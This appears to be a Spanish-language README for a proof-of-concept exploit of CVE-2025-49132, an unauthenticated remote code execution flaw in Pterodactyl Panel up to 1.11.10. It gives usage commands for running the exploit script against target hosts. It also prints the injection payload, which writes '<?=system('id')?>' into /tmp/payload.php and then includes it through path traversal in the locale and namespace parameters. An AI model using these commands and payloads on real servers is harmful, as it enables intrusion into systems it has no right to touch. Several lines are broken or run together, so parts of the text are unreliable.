
Exploit PoC para CVE-2025-49132 (GHSA-24wv-6c99-f843) – Ejecución remota de código no autenticada en Pterodactyl Panel ≤ 1.11.10
Panel Pterodactyl - Ejecución Remota de Código No Autenticada (RCE)
CVE‑2025‑49132 es una vulnerabilidad crítica de Ejecución Remota de Código que afecta a Pterodactyl Panel <= 1.11.10.
Un atacante no autenticado puede explotar una validación de entrada incorrecta en el endpoint /locales/locale.json para ejecutar comandos arbitrarios del sistema.
Parcheado en la versión: 1.11.11
La explotación exitosa permite:
.env)Gravedad: Crítica
La vulnerabilidad existe debido a una validación incorrecta de:
localenamespaceUn atacante puede:
../../../../../)config-create/tmpClasificación de debilidad: CWE-94 -- Control Incorrecto de la Generación de Código
python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR
Ruta por defecto:
/usr/share/php/PEAR
Obtener la ruta correcta desde la página /phpinfo.php

El atacante inyecta una carga útil PHP maliciosa en /tmp/payload.php usando:
/<?=system('id')?>+/tmp/payload.php
Llamando a:
?locale=../../../../../tmp&namespace=payload
El servidor ejecuta el PHP inyectado.

locale y namespace